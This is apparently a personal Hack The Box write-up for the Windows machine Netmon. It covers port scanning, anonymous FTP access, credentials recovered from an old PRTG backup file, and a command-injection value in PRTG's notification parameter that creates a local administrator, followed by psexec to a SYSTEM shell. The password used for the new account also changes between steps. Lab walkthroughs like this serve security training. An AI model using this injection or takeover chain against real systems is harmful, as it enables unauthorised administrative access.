#windows #hackthebox #easy
![[Pasted image 20250615134211.png]]
---
# Port Scanning - Nmap
Scanned all TCP ports to get an overview understanding of what ports are open.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.10.10.152 -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:49 CDT
Nmap scan report for 10.10.10.152
Host is up (0.050s latency).
Not shown: 64184 closed tcp ports (reset), 1338 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 18.53 seconds
```
Then performed another scan on those open ports but with `-sC` and `-sV` options.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.10.10.152 -p 21,80,135,139,445,5985,47001,49664-49669
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:52 CDT
Nmap scan report for 10.10.10.152
Host is up (0.050s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19 12:18AM 1024 .rnd
| 02-25-19 10:15PM <DIR> inetpub
| 07-16-16 09:18AM <DIR> PerfLogs
| 02-25-19 10:56PM <DIR> Program Files
| 02-03-19 12:28AM <DIR> Program Files (x86)
| 02-03-19 08:08AM <DIR> Users
|_11-10-23 10:20AM <DIR> Windows
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-06-15T18:53:49
|_ start_date: 2025-06-15T18:41:43
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.91 seconds
```
No open UDP ports. Well, at least no open ports among top 1,000 ports.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU 10.10.10.152 --min-rate 3000 --top-ports 1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-15 13:57 CDT
Nmap scan report for 10.10.10.152
Host is up (0.058s latency).
Not shown: 999 open|filtered udp ports (no-response)
PORT STATE SERVICE
36384/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 1.16 seconds
```
# Footprinting
### FTP 21
As we can see from the nmap output, FTP allows anonymous login. Let's take a look at the FTP server first.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ ftp $IP
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:parallels): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50035|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1024 .rnd
02-25-19 10:15PM <DIR> inetpub
07-16-16 09:18AM <DIR> PerfLogs
02-25-19 10:56PM <DIR> Program Files
02-03-19 12:28AM <DIR> Program Files (x86)
02-03-19 08:08AM <DIR> Users
11-10-23 10:20AM <DIR> Windows
226 Transfer complete.
```
In the path `/Users/Public/Desktop`, there is `user.txt` and two `.lnk` files which I downloaded and the `user.txt` file turned out to be the actual user flag.
```bash
ftp> pwd
Remote directory: /Users/Public/Desktop
ftp> ls
229 Entering Extended Passive Mode (|||50059|)
150 Opening ASCII mode data connection.
02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk
02-03-19 12:18AM 1160 PRTG Network Monitor.lnk
06-15-25 02:42PM 34 user.txt
226 Transfer complete.
```
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat user.txt
da47...
```
### HTTP 80
- I was prompted to enter creds but I haven't found any creds yet. Skipping this for now.
- I've tried default credentials `prtgadmin:prtgadmin` found in https://www.exploit-db.com/exploits/46527 but didn't work.
### SMB 445
tried null session with `smbclient` but didn't work. `smbmap` and `enum4linux` didn't reveal anything of interest either.
### HTTP 5985 & 47001
Not found..
### FTP 21 - Again
At this point, I couldn't enumerate any ports except port 21, so I logged in back to FTP server with anonymous login.
This time I tried `ls -la` command to reveal everything including hidden directories and traverse to `ProgramData` folder in which I found `Paessler` and `PRTG Network Monitor` directory.
I downloaded all 4 of files that start with `PRTG Configuration.` with `mget PRTG Configuration*`
```bash
229 Entering Extended Passive Mode (|||50718|)
150 Opening ASCII mode data connection.
06-15-25 03:23PM <DIR> Configuration Auto-Backups
06-15-25 02:42PM <DIR> Log Database
02-03-19 12:18AM <DIR> Logs (Debug)
02-03-19 12:18AM <DIR> Logs (Sensors)
02-03-19 12:18AM <DIR> Logs (System)
06-15-25 02:42PM <DIR> Logs (Web Server)
06-15-25 02:47PM <DIR> Monitoring Database
02-25-19 10:54PM 1189697 PRTG Configuration.dat
02-25-19 10:54PM 1189697 PRTG Configuration.old
07-14-18 03:13AM 1153755 PRTG Configuration.old.bak
06-15-25 03:23PM 1680954 PRTG Graph Data Cache.dat
02-25-19 11:00PM <DIR> Report PDFs
02-03-19 12:18AM <DIR> System Information Database
02-03-19 12:40AM <DIR> Ticket Database
02-03-19 12:18AM <DIR> ToDo Database
```
I looked through all 4 of the downloaded files and finally I found a set of credentials inside `PRTG Configuration.old.bak` file. Found credentials: `prtgadmin:PrTg@dmin2018`
![[Pasted image 20250615145017.png]]
Unfortunately, the password I found was still not valid.
![[Pasted image 20250615150430.png]]
Then I thought to try the password `PrTg@dmin2019` not "2018" and it worked. Come to think of it, everything makes sense because the creds I found was in a file named `PRTG Configuration.old.bak` which indicates it's an "old" backup file.
After successfully logging in, I was lost for a long time. Then I decided to refer to `0xdf`'s writeup. So the following exploit is not original but reference from `0xdf` and others.
Navigate to `Setup` -> `Notifications` under Account Settings and click the `+` sign to 'add new notification'.
Scroll to bottom and check `Execute Program`. The Parameter field is what's vulnerable and leading to exploit.
We are going to inject the following to the field:
`test.txt;net user wook wook413 /add;net localgroup administrators wook /add`
Let me breakdown the command:
- `test.txt` is just a random harmless value
- `;`: command separator which will allow the execution of following commands
- `net user wook wook413 /add`: adds a new user named `wook` with the password `wook413` to the system.
- `net localgroup administrators wook /add`: adds the newly created **wook** user to the **Administrators** group, giving it local admin privilege.
![[Pasted image 20250615151838.png]]
![[Pasted image 20250615155219.png]]
Upon hitting save, you are back in this screen. Click the far right icon of your newly created notification and select the bell shaped icon at the very top.
![[Pasted image 20250615154440.png]]
It says a test notification was triggered and queued for delivery.
![[Pasted image 20250615154614.png]]
After waiting a few seconds, I tried `smbclient` and `smbmap` to see if listing servers would work with the newly created account `wook:w00k413!` and they did!
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbclient -L //$IP/ -U 'wook%w00k413!'
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```
smbmap
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ smbmap -H $IP -u wook -p 'w00k413!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans -
[email protected]
https://github.com/ShawnDEvans/smbmap
[\] Checking for open ports... [|] Checking for open ports... [*] Detected 1 hosts serving SMB
[/] Authenticating... [-] Authenticating... [\] Authenticating... [|] Authenticating... [/] Authenticating... [*] Established 1 SMB connections(s) and 1 authenticated session(s)
[-] Enumerating shares...
[+] IP: 10.10.10.152:445 Name: 10.10.10.152 Status: ADMIN!!!
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ READ ONLY Remote IPC
```
From here, we have many different options to get a shell as administrator but here, we are going to use `psexec.py`
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ psexec.py 'wook:w00k413!'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file uSbNnSbL.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service IPZa on 10.10.10.152.....
[*] Starting service IPZa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
```
found `root.txt`!
```powershell
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Administrator\Desktop
02/03/2019 12:35 AM <DIR> .
02/03/2019 12:35 AM <DIR> ..
06/15/2025 02:42 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,735,409,152 bytes free
C:\Users\Administrator\Desktop> type root.txt
a46b...
```